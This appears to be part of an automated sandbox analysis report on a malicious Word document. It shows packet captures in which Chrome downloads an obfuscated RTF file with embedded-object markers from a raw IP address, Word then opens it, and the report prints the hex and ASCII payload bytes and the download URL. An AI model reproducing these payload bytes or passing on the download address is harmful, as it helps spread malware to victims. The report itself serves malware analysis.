                                                                                                                                                              Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 09 09 09 09 09 7b 5c 2a 5c 61 64 6a 75 73 74 38 56 61 6c 75 65 36 33 39 38 36 30 35 30 36 20 5c 5f 7d 0d 7b 5c 32 33 34 33 39 36 36 39 31 3f 5f 3f 5b 2b 2c 3e 25 7e 3e 37 2f 3f 3a 3f 3d 29 3d 27 3a 38 3a 2d 3f 2d 3b 2a 2e 25 32 25 7c 35 25 3f 24 3d 24 37 35 5f 38 27 2c b0 35 29 3f 36 3f 60 39 3a 2c 21 5b 2a 30 3f 2b 21 5e 5e 2f 3f 39 3f 7e 3a 5b 5f 3d a7 32 38 31 30 7c 3a 29 5f 2d 60 b5 5d 5f 30 38 2f 7e 3b 3a 60 33 37 38 26 25 40 37 21 2e 2b 34 5e 32 60 36 30 35 3c 32 2b 7e 23 2e 3f 3d 3f 2e 2b 40 39 3a 36 7e 38 2e b0 2d 33 5b 5d 3f 5e 3a 25 3f 5b 2d 5e 40 2b 25 30 5f 60 b5 25 26 2c 25 3e 3b 5f 3e 7e 29 b5 29 7e 3a 2f 32 2e 34 3f 33 40 7c 3b 5f 23 5f 7c 34 2a 2b 39 5f 2e 29 5e 7e 37 40 39 3f 40 7c 26 35 3f 2e 35 2c 60 5e 3b 5e 29 25 23 36 2a 3f 36 37 32 3f 5b 24 25 2d 2b 3f 23 36 31 35 33 38 21 5b 36 3f 5e 2f 3f 7c 7c b5 b0 40 3f 21 3d 27 33 33 34 2a b5 26 25 25 32 5d 30 2e 26 33 60 35 3c 31 3f 3a 7c 3f 38 38 23 3f 3a 3c 33 2c 3f 3f 33 32 3f 5b 23 33 3b 26 30 33 39 3f 30 36 35 2f 30 5b 7e 2e 34 3a 5f 23 5e 31 3e 38 2d 2c 40 3f 2d 30 34 7e 5e 7e 3c 39 30 37 5b 5e 37 7c 2e 3c 3e 23 33 5d 7c 40 60 3f 5e 2f b0 3f 37 27 3e 23 23 2f 35 5f 60 40 28 32 3f 3f 60 7c 2b 3f 3d 60 3a b0 3f 37 3a 3f 3f 3f 3f 5f 25 a7 32 3a 3f 29 40 25 5d 24 2b 3f 24 38 29 3f 30 35 3f 28 21 2f 34 3a 2e 26 7e 3e 3f b5 3f 27 37 37 a7 5b 36 3f 23 3b 5b 27 5b 25 25 5f 2f 37 32 29 28 21 33 37 7c 7e 35 33 2b 39 3c 29 3f 32 3f 3f 2d 25 29 30 3c 7c 2a 3f 5b 3f 33 3c 28 3f 60 37 2e 3b 3f 26 3f 27 5d 3b 3f 5d 2c 3d a7 33 5f 29 3b 23 b5 b5 b5 3a 3d 25 38 25 b5 2d b0 7c 27 b0 5f 35 3a 3a 3c 23 38 23 3e 2a b0 35 3f 24 3f 2f 24 3c 5e 2d 3f 36 2a 3c 2a 5d 3c 24 3f 5f 2b 7e 24 3a 5b 3f 3f 21 27 30 36 37 40 b0 26 2e 30 38 30 3f 3d 5f 3f 33 b0 26 5e 3a 35 31 7c 31 3f 21 31 25 25 3c 60 b5 60 23 3f 35 29 7c 3d 34 31 2e 2c a7 3f 5f 2a 2e 36 36 b0 2d 2f 3e 3b 3f 3f 5e 7c 32 24 3b 2c 29 21 b5 33 36 35 b5 b5 5e 5f a7 7e 3f 3f 40 26 2d 25 2d 7e 30 5e 3f b5 3a 37 21 3b 5f 5f 2f 40 b5 5d 40 23 21 27 60 a7 35 30 5e 3f 3f 26 25 34 37 23 31 31 27 3d 29 29 24 3d 38 3f 7e 2c 60 2e 39 31 a7 7e 32 36 32 3d 24 3d 31 35 3f 38 a7 a7 24 5f 23 29 38 32 b5 7c 3d 3d 38 36 39 3f 36 37 3f 3e 23 29 30 25 3f 32 37 23 3f 3f 7e 5b 2c 2b 3f 3d b0 38 3f 31 25 2c b5 2f 40 5d 29 32 33 26 29 30 b5 25 36 27 2d 39 3f b0 a7 26 33 25 2c a7 3a 23 7c 30 3f 60 2c 23 24 2b 3c 30 5f 26 7e 3b 27 b5 b0 2f 2b 27 30 2c 2c 25 2c 3a 2d 31 26 60 5d 30 32 2a 24 7c 5d 32 7e 35 3f 31 40 24 5e 60 2d 28 28 3e 60 25 3d 34 2f 5f 3d 3f 33 3f 3f 31 28 60 3b 37 5b 32 40 28 35 3b 3a 31 2f 30 3d 3f 23 32 35 2f 27 39 3f 2b b5 60 3c 29 3d 27 7c 25 40 25 3d 2a 7e a7 26 29 25 7c 30 31 2c 7c 5f 2d 3f 24 2c 5b 5d b0 32 27 3f 28 29 28 b0 3c 28 27 2f 5f 32 26 31 2c 35 25 a7 25 33 25 35 30 7e 3f b5 3a 30 7c 34 b0 24 32 5d 25 b5 2d 2d 26 23 7e 38 32 31 23 3a 21 25 60 39 29 3a 34 2b a7 34 25 3f 29 26 32 3e 3f 24 3e 38 26 37 3f 5b
                                                                                                                                                              Data Ascii: {\rtf1{\*\adjust8Value639860506 \_}{\234396691?_?[+,>%~>7/?:?=)=':8:-?-;*.%2%|5%?$=$75_8',5)?6?`9:,![*0?+!^^/?9?~:[_=2810|:)_-`]_08/~;:`378&%@7!.+4^2`605<2+~#.?=?.+@9:6~8.-3[]?^:%?[-^@+%0_`%&,%>;_>~))~:/2.4?3@|;_#_|4*+9_.)^~7@9?@|&5?.5,`^;^)%#6*?672?[$%-+?#61538![6?^/?||@?!='334*&%%2]0.&3`5<1?:|?88#?:<3,??32?[#3;&039?065/0[~.4:_#^1>8-,@?-04~^~<907[^7|.<>#3]|@`?^/?7'>##/5_`@(2??`|+?=`:?7:????_%2:?)@%]$+?$8)?05?(!/4:.&~>??'77[6?#;['[%%_/72)(!37|~53+9<)?2??-%)0<|*?[?3<(?`7.;?&?'];?],=3_);#:=%8%-|'_5::<#8#>*5?$?/$<^-?6*<*]<$?_+~$:[??!'067@&.080?=_?3&^:51|1?!1%%<``#?5)|=41.,?_*.66-/>;??^|2$;,)!365^_~??@&-%-~0^?:7!;__/@]@#!'`50^??&%47#11'=))$=8?~,`.91~262=$=15?8$_#)82|==869?67?>#)0%?27#??~[,+?=8?1%,/@])23&)0%6'-9?&3%,:#|0?`,#$+<0_&~;'/+'0,,%,:-1&`]02*$|]2~5?1@$^`-((>`%=4/_=?3??1(`;7[2@(5;:1/0=?#25/'9?+`<)='|%@%=*~&)%|01,|_-?$,[]2'?()(<('/_2&1,5%%3%50~?:0|4$2]%--&#~821#:!%`9):4+4%?)&2>?$>8&7?[
                                                                                                                                                              Jun 8, 2023 10:43:31.077047110 CEST599INData Raw: 31 b0 25 25 b5 3e b5 2c 37 34 39 7e 21 b0 2f 21 7c 2a 25 3f 21 3a 28 37 3c 3c 29 2e 24 29 21 5d 24 39 30 28 5b 7e 30 5f 40 3f 37 3b 2d 29 3a 40 60 a7 2d 2c 60 5d 5d b5 33 38 3b 2f 21 3f 25 35 34 36 b0 36 38 5f 3e 23 7e 3a 5b 2f 2f 3f 36 40 a7 28
                                                                                                                                                              Data Ascii: 1%%>,749~!/!|*%?!:(7<<).$)!]$90([~0_@?7;-):@`-,`]]38;/!?%54668_>#~:[//?6@(,-;991'+*?'.#%<?68!?=~!;?-1,_?59'^>_1?.+8#.4<#?81,^43?*#~>+%?1^6_'?<21*]&6;|?$.>|9@?></??14$9%-@,1$]/;&?`9`])~,(?`7#_@4(;%<%!@9'^8([!-^*_2]/&,@-$?(56%51:
                                                                                                                                                              Jun 8, 2023 10:43:31.077092886 CEST600INData Raw: 28 30 60 b5 3a 26 60 27 5b 39 7e 25 3f 25 28 3b 2d 37 28 2b 3f a7 5f 3a 3f 38 33 2a 3f 25 26 3e 3e 7e 3f 25 5e 3b 23 3d 28 25 37 2a 3f 5b 31 38 3b 3b 3f 25 30 21 3b 3f 2f 38 36 3f b0 5e 40 3f b5 3a 26 3c 3f 27 30 25 2f 35 2f 40 37 39 60 37 7c 60
                                                                                                                                                              Data Ascii: (0`:&`'[9~%?%(;-7(+?_:?83*?%&>>~?%^;#=(%7*?[18;;?%0!;?/86?^@?:&<?'0%/5/@79`7|`:@=+@!?|(@:-&;~5+<???=.7&`17%%?.:1:,%]?(!&6=/?`~4*8(~.!+,2;'86/_#_(#=@(?^?1_(,$1]#+;8'*'=]=8?;%|7?9%4|4=>^??`24$)!=[?[5/+1[68;^-:0~%;1~(>$-_^3~=),*3~5<?
                                                                                                                                                              Jun 8, 2023 10:43:31.077163935 CEST602INData Raw: a7 b0 7c 3f 23 5d 5b 31 3a 2a 29 2e 3d 39 25 24 29 5e 2c b5 31 5e 26 25 3d 2f 40 2d 38 3f 3f 7c 5d b5 7c 5e 3f 25 32 25 7e 60 29 b0 29 3d 26 3f 5f 23 3f 31 5d b5 3f 26 2b 21 39 21 23 5b 60 3c 37 5e 2d 60 3f 26 37 7c 25 30 2d 5f 3f 3f 27 7c 2d 5b
                                                                                                                                                              Data Ascii: |?#][1:*).=9%$)^,1^&%=/@-8??|]|^?%2%~`))=&?_#?1]?&+!9!#[`<7^-`?&7|%0-_??'|-[,8/=$]/82%%)@>5+,,?(*!_>_?<==~(3`%[)38;*-[(_<?/9$:_5=-')??(?[?53=9*_[.|0`%[]2)83`?@#?>8-_4#,_^?'=|2/@8_?-@40/^/26?7??:$_6>(8-[#/04$3==?>%1*0<26@97?5%
                                                                                                                                                              Jun 8, 2023 10:43:31.077213049 CEST603INData Raw: 37 33 34 20 5c 62 69 6e 30 30 30 5c 35 37 36 37 37 31 30 37 36 31 36 37 32 39 37 39 7d 0d 5c 74 68 65 6d 65 6c 61 6e 67 35 33 38 34 5c 76 69 65 77 7a 6b 34 31 32 31 37 5c 27 3f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                              Data Ascii: 734 \bin000\5767710761672979}\themelang5384\viewzk41217\'? {\object\xugkiwcurqqueehnhvlxqshaSWVBMNKB1477584409467869633xugkiwcurqqueehnhvlxqshaSWVBMNKB62942284719
                                                                                                                                                              Jun 8, 2023 10:43:31.077260971 CEST604INData Raw: 20 20 09 66 0d 66 09 20 20 20 09 66 09 20 20 20 09 66 66 66 66 66 0a 66 09 09 20 20 20 66 09 09 20 20 20 66 66 0a 66 09 09 20 20 20 66 20 09 20 20 09 66 66 66 66 66 20 20 20 20 09 66 09 20 20 20 09 66 66 66 0d 66 66 0d 66 66 09 20 20 20 09 66 20
                                                                                                                                                              Data Ascii: ff f ffffff f fff f fffff f fffffff f f fffff ff ff ffffff ffff ffff f fff ffffff ff fff fffff ff f f fffffff fff
                                                                                                                                                              Jun 8, 2023 10:43:31.077306986 CEST606INData Raw: 09 09 20 09 20 66 66 66 0a 66 09 20 09 09 20 66 09 20 09 09 20 66 09 20 09 09 20 66 20 09 09 09 20 66 0a 66 66 66 09 20 09 09 20 66 66 0a 66 66 20 20 20 09 20 66 0a 66 66 66 66 0a 66 0a 66 20 20 20 09 20 66 66 20 09 20 09 20 66 20 09 20 09 20 66
                                                                                                                                                              Data Ascii: ffff f f f ffff ffff fffffff ff f ff f fffff f ffffff ffffff f fffff ff ffffffffff ff fffff fffffff ffffffffff fff f
                                                                                                                                                              Jun 8, 2023 10:43:31.077353954 CEST607INData Raw: 09 20 09 66 66 66 0a 66 09 20 09 20 09 66 0a 66 66 0a 66 0a 66 09 20 09 20 09 66 09 09 09 20 09 66 0a 66 66 66 0d 66 09 09 09 20 09 66 66 66 0a 66 0a 66 66 0a 66 0a 66 66 66 20 09 09 20 09 66 66 09 20 09 20 09 66 66 0d 66 09 09 20 20 09 66 09 20
                                                                                                                                                              Data Ascii: ffff fffff f fffff ffffffffff ff fff f fff ff ffff fff fff fffff f ffffffffffff ffffffffff fff fff fffff fff ff
                                                                                                                                                              Jun 8, 2023 10:43:31.077404976 CEST608INData Raw: 66 20 09 20 09 09 66 66 0a 66 0a 66 0a 66 66 66 66 66 66 66 0a 66 20 20 20 09 09 66 0a 66 0d 66 20 09 09 09 09 66 09 09 09 09 09 66 0d 66 66 66 66 66 66 66 09 20 20 20 09 66 66 66 20 09 20 20 09 66 0a 66 66 0a 66 66 20 09 20 20 09 66 20 09 20 20
                                                                                                                                                              Data Ascii: f ffffffffffff fff fffffffff fff fffff f ffffffffffffffffff ffffffff ffffffff fffff ffff fff fffffffff ff f fff f ffffffffffffff f
                                                                                                                                                              Jun 8, 2023 10:43:31.077471972 CEST609INData Raw: 33 31 30 30 20 09 20 20 20 33 20 09 20 20 20 30 0d 30 0d 30 36 65 30 0d 30 09 09 20 20 20 34 0d 31 09 20 20 09 20 30 30 09 20 09 09 20 35 0d 34 30 30 34 09 20 09 09 20 39 0a 30 0a 30 20 09 09 09 20 35 36 30 20 20 09 09 20 30 34 35 30 30 30 0a 30
                                                                                                                                                              Data Ascii: 3100 3 0006e00 41 00 54004 900 560 04500000 00 00 000 0 00000000000000 000000000 00000 0000 0 0000000000000 000 00 000 0 0000
                                                                                                                                                              Jun 8, 2023 10:43:31.194693089 CEST611INData Raw: 09 09 09 30 20 09 20 09 09 30 0d 30 20 09 20 09 09 30 30 30 30 09 09 20 09 09 30 20 09 20 09 09 30 30 09 09 20 20 09 30 09 09 20 20 09 30 30 30 09 09 09 20 09 30 30 09 09 09 20 09 30 30 30 30 30 30 30 30 30 0a 30 30 30 30 0a 30 0a 30 20 09 09 20
                                                                                                                                                              Data Ascii: 0 00 0000 0 00 0 000 00 000000000000000 0000 0 000 0 0000 0000000000 0 00000 00 00 00 0000 0 0000000000000ff ff ffff ffffff


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.549724192.3.176.14680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jun 8, 2023 10:44:16.139147997 CEST793OUTData Raw: 00
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.549721142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-06-08 08:43:29 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                              Host: accounts.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 1
                                                                                                                                                              Origin: https://www.google.com
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-06-08 08:43:29 UTC0OUTData Raw: 20
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2023-06-08 08:43:29 UTC2INHTTP/1.1 200 OK
                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                              Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Thu, 08 Jun 2023 08:43:29 GMT
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3z4GQHMYU1ZVIznUBRa4ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                              Server: ESF
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2023-06-08 08:43:29 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                              2023-06-08 08:43:29 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.549722142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-06-08 08:43:29 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                              Host: clients2.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              X-Goog-Update-Interactivity: fg
                                                                                                                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                              X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-06-08 08:43:29 UTC1INHTTP/1.1 200 OK
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-v2-W4_BHt9n9VdOtEvp1Uw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Thu, 08 Jun 2023 08:43:29 GMT
                                                                                                                                                              Content-Type: text/xml; charset=UTF-8
                                                                                                                                                              X-Daynum: 6002
                                                                                                                                                              X-Daystart: 6209
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              Server: GSE
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2023-06-08 08:43:29 UTC1INData Raw: 32 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 30 30 32 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 36 32 30 39 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20
                                                                                                                                                              Data Ascii: 2c8<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6002" elapsed_seconds="6209"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                              2023-06-08 08:43:29 UTC2INData Raw: 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                              Data Ascii: 3f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                              2023-06-08 08:43:29 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:10:43:27
                                                                                                                                                              Start date:08/06/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                                                                                                              Imagebase:0x7ff7d31b0000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:10:43:28
                                                                                                                                                              Start date:08/06/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1644,i,5898683217458233683,13373722680240727198,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                              Imagebase:0x7ff7d31b0000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:10:43:30
                                                                                                                                                              Start date:08/06/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc
                                                                                                                                                              Imagebase:0x7ff7d31b0000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:10:43:32
                                                                                                                                                              Start date:08/06/2023
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc" /o "
                                                                                                                                                              Imagebase:0x140000
                                                                                                                                                              File size:1937688 bytes
                                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              No disassembly